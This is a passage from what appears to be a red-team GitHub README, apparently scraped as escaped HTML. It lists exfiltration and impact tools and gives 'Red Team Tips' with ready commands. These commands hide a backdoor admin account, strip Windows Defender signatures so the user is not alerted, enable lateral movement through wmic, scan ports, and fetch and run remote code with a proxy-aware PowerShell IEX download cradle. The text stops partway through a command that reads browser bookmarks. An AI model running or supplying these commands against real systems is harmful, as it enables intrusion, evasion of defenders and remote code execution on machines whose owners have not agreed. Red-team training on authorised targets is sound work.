open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003eExfiltration\u003c/b\u003e 5 tools\u003c/summary\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n\t \u003cli\u003e\u003cb\u003e\u003ca href=\"#dnscat2\"\u003eDnscat2\u003c/a\u003e\u003c/b\u003e\u003ci\u003e C2 via DNS tunneling\u003c/i\u003e\u003c/li\u003e\n\t \u003cli\u003e\u003cb\u003e\u003ca href=\"#cloakify\"\u003eCloakify\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Data transformation for exfiltration\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#pyexfil\"\u003ePyExfil\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Data exfiltration PoC\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#powershell-rat\"\u003ePowershell RAT\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Python based backdoor\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#gd-thief\"\u003eGD-Thief\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Google drive exfiltration\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails open=\"\"\u003e\n \u003csummary\u003e\u003cb\u003eImpact\u003c/b\u003e 4 tools\u003c/summary\u003e\n \u003cul 
dir=\"auto\"\u003e\n \u003cul dir=\"auto\"\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#conti-pentester-guide-leak\"\u003eConti Pentester Guide Leak\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Conti ransomware group affilate toolkit\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#slowloris\"\u003eSlowLoris\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Simple denial of service\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#usbkill\"\u003eusbkill\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Anti-forensic kill-switch\u003c/i\u003e\u003c/li\u003e\n \u003cli\u003e\u003cb\u003e\u003ca href=\"#keytap\"\u003eKeytap\u003c/a\u003e\u003c/b\u003e\u003ci\u003e Get pressed keyboard keys from typing audio\u003c/i\u003e\u003c/li\u003e\n \u003c/ul\u003e\n \u003c/ul\u003e\n\u003c/details\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch1 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003eRed Team Tips\u003c/h1\u003e\u003ca id=\"user-content-red-team-tips\" class=\"anchor\" aria-label=\"Permalink: Red Team Tips\" href=\"#red-team-tips\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eLearn from Red Teamers with a collection of Red Teaming Tips. 
These tips cover a range of tactics, tools, and methodologies to improve your red teaming abilities.\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eImproved HTML smuggling with mouse move eventlistener\u003c/h3\u003e\u003ca id=\"user-content-improved-html-smuggling-with-mouse-move-eventlistener\" class=\"anchor\" aria-label=\"Permalink: 🔙Improved HTML smuggling with mouse move eventlistener\" href=\"#improved-html-smuggling-with-mouse-move-eventlistener\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'Qakbot added an EventListener for mouse movement to the HTML smuggling attachment for anti evasion in sandbox's the zip wont drop.'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://x.com/pr0xylife\" rel=\"nofollow\"\u003e@pr0xylife\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://x.com/pr0xylife/status/1598410732516802563\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv 
class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eGoogle translate for phishing\u003c/h3\u003e\u003ca id=\"user-content-google-translate-for-phishing\" class=\"anchor\" aria-label=\"Permalink: 🔙Google translate for phishing\" href=\"#google-translate-for-phishing\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003eSuccessful phishing page credential stealing being proxied via the google translate page view functionality.\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://x.com/malmoeb\" rel=\"nofollow\"\u003e@malmoeb\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://x.com/malmoeb/status/1671106885590630400\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eHiding the local admin account\u003c/h3\u003e\u003ca id=\"user-content-hiding-the-local-admin-account\" 
class=\"anchor\" aria-label=\"Permalink: 🔙Hiding the local admin account\" href=\"#hiding-the-local-admin-account\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"reg add \u0026quot;HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\u0026quot; /t REG_DWORD /v alh4zr3d /d 0 /f\"\u003e\u003cpre\u003ereg add \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eHKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\UserList\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e /t REG_DWORD /v alh4zr3d /d 0 /f\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'Creating accounts is risky when evading blue, but when creating a local admin, use some cute sorcery in the registry to hide it.'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d\" rel=\"nofollow\"\u003e@Alh4zr3d\u003c/a\u003e\u003c/p\u003e\n\u003cp 
dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d/status/1612913838999113728\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eCripple windows defender by deleting signatures\u003c/h3\u003e\u003ca id=\"user-content-cripple-windows-defender-by-deleting-signatures\" class=\"anchor\" aria-label=\"Permalink: 🔙Cripple windows defender by deleting signatures\" href=\"#cripple-windows-defender-by-deleting-signatures\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"\u0026quot;%Program Files%\\Windows Defender\\MpCmdRun.exe\u0026quot; -RemoveDefinitions -All\"\u003e\u003cpre\u003e\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e%Program Files%\\Windows Defender\\MpCmdRun.exe\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e -RemoveDefinitions -All\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e 
\u003cem\u003e'A bit messy, but if Windows Defender is causing you a big headache, rather than disabling it (which alerts the user), you should just neuter it by deleting all the signatures.'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d\" rel=\"nofollow\"\u003e@Alh4zr3d\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d/status/1611005101262389250\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eEnable multiple RDP sessions per user\u003c/h3\u003e\u003ca id=\"user-content-enable-multiple-rdp-sessions-per-user\" class=\"anchor\" aria-label=\"Permalink: 🔙Enable multiple RDP sessions per user\" href=\"#enable-multiple-rdp-sessions-per-user\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"reg add HKLM\\System\\CurrentControlSet\\Control\\TerminalServer /v 
fSingleSessionPerUser /d 0 /f\"\u003e\u003cpre\u003ereg add HKLM\u003cspan class=\"pl-cce\"\u003e\\S\u003c/span\u003eystem\u003cspan class=\"pl-cce\"\u003e\\C\u003c/span\u003eurrentControlSet\u003cspan class=\"pl-cce\"\u003e\\C\u003c/span\u003eontrol\u003cspan class=\"pl-cce\"\u003e\\T\u003c/span\u003eerminalServer /v fSingleSessionPerUser /d 0 /f\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'Sometimes you want to log in to a host via RDP or similar, but your user has an active session. Enable multiple sessions per user.'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d\" rel=\"nofollow\"\u003e@Alh4zr3d\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d/status/1609954528425558016\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eSysinternals PsExec.exe local alternative\u003c/h3\u003e\u003ca id=\"user-content-sysinternals-psexecexe-local-alternative\" class=\"anchor\" aria-label=\"Permalink: 🔙Sysinternals PsExec.exe local alternative\" href=\"#sysinternals-psexecexe-local-alternative\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 
0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c \u0026quot; command \u0026quot;\"\u003e\u003cpre\u003ewmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e command \u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'Are you tired of uploading Sysinternals PsExec.exe when doing lateral movement? Windows has a better alternative preinstalled. Try this instead.'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/GuhnooPlusLinux\" rel=\"nofollow\"\u003e@GuhnooPlusLinux\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/GuhnooPlusLinux/status/1607473627922063360\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eLive off the land port scanner\u003c/h3\u003e\u003ca id=\"user-content-live-off-the-land-port-scanner\" class=\"anchor\" aria-label=\"Permalink: 🔙Live off the land port scanner\" href=\"#live-off-the-land-port-scanner\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 
3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(\u0026lt;tgt_ip\u0026gt;,$_)) \u0026quot;Port $_ open\u0026quot;} 2\u0026gt;$null\"\u003e\u003cpre\u003e0..65535 \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e % {echo \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e((\u003c/span\u003enew\u003cspan class=\"pl-k\"\u003e-\u003c/span\u003eobject Net.Sockets.TcpClient).Connect(\u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003etgt_ip\u003cspan class=\"pl-k\"\u003e\u0026gt;,\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003e$_\u003c/span\u003e\u003cspan class=\"pl-pds\"\u003e))\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003ePort \u003cspan class=\"pl-smi\"\u003e$_\u003c/span\u003e open\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e} \u003cspan class=\"pl-k\"\u003e2\u0026gt;\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003e$null\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'When possible, live off the land rather than uploading tools to machines (for many reasons). PowerShell/.NET help. 
Ex: simple port scanner in Powershell.'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d\" rel=\"nofollow\"\u003e@Alh4zr3d\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d/status/1605060950339588096\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eProxy aware PowerShell DownloadString\u003c/h3\u003e\u003ca id=\"user-content-proxy-aware-powershell-downloadstring\" class=\"anchor\" aria-label=\"Permalink: 🔙Proxy aware PowerShell DownloadString\" href=\"#proxy-aware-powershell-downloadstring\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString(\u0026quot;\u0026lt;url\u0026gt;\u0026quot;)\"\u003e\u003cpre\u003e\u003cspan 
class=\"pl-smi\"\u003e$w\u003c/span\u003e=(New-Object Net.WebClient)\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003e$w\u003c/span\u003e.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003eIEX \u003cspan class=\"pl-smi\"\u003e$w\u003c/span\u003e.DownloadString(\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u0026lt;url\u0026gt;\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e)\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'Most large orgs are using web proxies these days. The standard PowerShell download cradle is not proxy aware. Use this one.'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d\" rel=\"nofollow\"\u003e@Alh4zr3d\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d/status/1596192664398966785\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eLooking for internal endpoints in browser bookmarks\u003c/h3\u003e\u003ca id=\"user-content-looking-for-internal-endpoints-in-browser-bookmarks\" class=\"anchor\" aria-label=\"Permalink: 🔙Looking for internal endpoints in browser bookmarks\" href=\"#looking-for-internal-endpoints-in-browser-bookmarks\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 
0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"type \u0026quot;C:\\Users\\%USERNAME%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks.bak\u0026quot; | findstr /c \u0026quot;name url\u0026quot; | findstr /v \u0026quot;type\u0026quot;\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c1\"\u003etype\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eC:\\Users\\%USERNAME%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks.bak\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e findstr /c \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003ename url\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e 